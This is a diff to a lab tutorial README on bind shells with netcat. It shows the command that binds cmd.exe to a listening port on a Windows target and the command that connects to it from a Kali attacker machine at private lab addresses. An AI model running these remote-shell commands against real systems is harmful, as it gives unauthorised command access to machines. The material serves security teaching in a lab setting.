SavioFengGit/Binding-Shell-and-Reverse-Shell-with-Netcat/README.md

 **Kali Attacker**:10.10.9.3

 ## Bind a Shell
-Execute the command on Windows Target:
- - nc.exe -nvlp 1234 -e cmd.exe <br>
+ - nc.exe -nvlp 1234 -e cmd.exe (Windows in listening)<br>
 <img src="nct.png" width=70% height="auto"><br>
-We can now connect to the bind shell listener running on the Windows system from the Kali Linux system by running the following command:
+We can now connect to the Target system from the Kali Linux system by running the following command:
- - nc -nv 10.3.27.30 1234 (connect to the Windows Target ip)
+ - nc -nv 10.3.27.30 1234 (connect to the target)
  - systeminfo (check that we are into the Windows Machine)<br>
 <img src="nck.png" width=70% height="auto"><br>